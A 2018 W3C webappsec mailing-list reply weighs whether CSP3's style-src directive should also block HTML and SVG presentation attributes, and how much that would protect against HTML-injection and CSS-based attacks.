Re: [CSP3] "style-src 'none';" and presentation hints/mapped attributes

On Wed, Oct 3, 2018 at 1:11 PM Jonathan Watt <jwatt@jwatt.org> wrote:

> I don't see much previous discussion (only [1]) about attributes that are
> treated as presentation hints and mapped into style[2][3] and how they
> should be
> treated when the 'style' attribute is blocked.
>
> It would seem to make sense to block mapped attributes in this case for
> HTML,
> but it would break most SVG content.
>

Conceptually, treating presentation attributes as styles makes sense to me
and I wouldn't expect a lot of breakage as a result of doing so, given that
most applications which define style-src set 'unsafe-inline' because inline
style attributes are extremely common.

When it comes to the security value, I'm a little skeptical about this
providing useful protections against attackers with an HTML injection. CSP
can't prevent an attacker from drawing arbitrary pixels on the screen --
e.g. via a <table> with cells using different bgcolor values, or, more
realistically, by reusing existing ids/classes which get styled according
to the application's existing CSS rules.

Overall, my guess is that if we're focusing on the practical anti-XSS
benefits of CSP, we might not gain very much from making style-src apply to
these SVG attributes. Rather, I expect that the CSP3 style-src-{elem,attr}
<https://www.chromestatus.com/feature/5141352765456384> directives will
allow developers to enforce restrictions on the more dangerous CSS
functionality (require nonces/hashes for <style> blocks to restrict the use
of selectors, which enable e.g. the "CSS keylogger" attack) but still allow
inline style attributes to reduce the amount of changes developers need to
make to their HTML.

Cheers,
-Artur

1. https://lists.w3.org/Archives/Public/public-webappsec/2012Nov/0019.html
> 2.
>
> https://html.spec.whatwg.org/#the-css-user-agent-style-sheet-and-presentational-hints
> 3.
> https://svgwg.org/svg2-draft/single-page.html#attindex-PresentationAttributes
>
>